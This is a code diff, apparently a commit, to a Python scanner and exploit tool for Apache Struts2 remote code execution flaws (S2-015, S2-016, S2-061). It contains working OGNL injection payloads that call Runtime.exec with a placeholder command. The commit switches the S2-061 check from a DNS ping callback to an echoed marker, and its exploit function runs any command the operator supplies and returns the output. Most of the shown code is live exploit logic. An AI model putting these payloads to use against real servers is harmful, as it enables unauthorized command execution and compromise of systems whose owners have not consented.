|
1 | 1 | #!/usr/bin/env python3 |
2 | 2 | # -*- coding: utf-8 -*- |
| 3 | +import re |
3 | 4 | import http.client |
4 | 5 | import base64 |
5 | 6 | from thirdparty import requests |
@@ -59,7 +60,7 @@ def __init__(self, url): |
59 | 60 | 'ing(%23d))%2C%23out.close()%7D' |
60 | 61 | self.payload_s2_015 = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \ |
61 | 62 | r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \ |
62 | | - r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInp" \ |
| 63 | + r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \ |
63 | 64 | r"utStream())}.action" |
64 | 65 | self.payload_s2_016_1 = r"?redirect:${%23req%3d%23context.get(%27co%27" \ |
65 | 66 | r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \ |
@@ -423,7 +424,7 @@ def s2_016_poc(self): |
423 | 424 | if md in misinformation(self.req.text, md): |
424 | 425 | self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore') |
425 | 426 | self.vul_info["prt_resu"] = "PoCSuCCeSS" |
426 | | - self.vul_info["vul_payd"] = self.payload |
| 427 | + self.vul_info["vul_payd"] = self.payload_1 |
427 | 428 | self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "]" |
428 | 429 | verify.scan_print(self.vul_info) |
429 | 430 | except requests.exceptions.Timeout: |
@@ -799,18 +800,19 @@ def s2_061_poc(self): |
799 | 800 | " may lead to remote code execution." |
800 | 801 | self.vul_info["cre_date"] = "2021-01-30" |
801 | 802 | self.vul_info["cre_auth"] = "zhzyker" |
802 | | - md = dns_request() |
803 | | - cmd = "ping " + md |
| 803 | + md = random_md5() |
| 804 | + cmd = "echo " + md |
804 | 805 | self.payload = self.payload_s2_061.replace("RECOMMAND", cmd) |
805 | 806 | if r"?" not in self.url: |
806 | | - self.url_061 = self.url + "?id=" |
| 807 | + self.url_061 = self.url + "/?id=" |
807 | 808 | try: |
808 | 809 | self.req = requests.get(self.url_061 + self.payload, headers=self.headers, timeout=self.timeout, verify=False) |
809 | | - if dns_result(md): |
| 810 | + req = re.findall(r'<a id="(.*)', self.req.text)[0] |
| 811 | + if misinformation(req, md): |
810 | 812 | self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore') |
811 | 813 | self.vul_info["prt_resu"] = "PoCSuCCeSS" |
812 | 814 | self.vul_info["vul_payd"] = self.payload |
813 | | - self.vul_info["prt_info"] = "[dns] [cmd: " + cmd + "]" |
| 815 | + self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "]" |
814 | 816 | verify.scan_print(self.vul_info) |
815 | 817 | except requests.exceptions.Timeout: |
816 | 818 | verify.timeout_print(self.vul_info["prt_name"]) |
@@ -1082,12 +1084,11 @@ def s2_061_exp(self, cmd): |
1082 | 1084 | vul_name = "Apache Struts2: S2-061" |
1083 | 1085 | self.payload = self.payload_s2_061.replace("RECOMMAND", cmd) |
1084 | 1086 | if r"?" not in self.url: |
1085 | | - self.url_061 = self.url + "?id=" |
| 1087 | + self.url_061 = self.url + "/?id=" |
1086 | 1088 | try: |
1087 | 1089 | self.req = requests.get(self.url_061 + self.payload, headers=self.headers, timeout=self.timeout, verify=False) |
1088 | | - r = "Command Executed Successfully (But No Echo)" |
1089 | 1090 | self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore') |
1090 | | - verify.exploit_print(r, self.raw_data) |
| 1091 | + verify.exploit_print(self.req.text, self.raw_data) |
1091 | 1092 | except requests.exceptions.Timeout: |
1092 | 1093 | verify.timeout_print(vul_name) |
1093 | 1094 | except requests.exceptions.ConnectionError: |
|
0 commit comments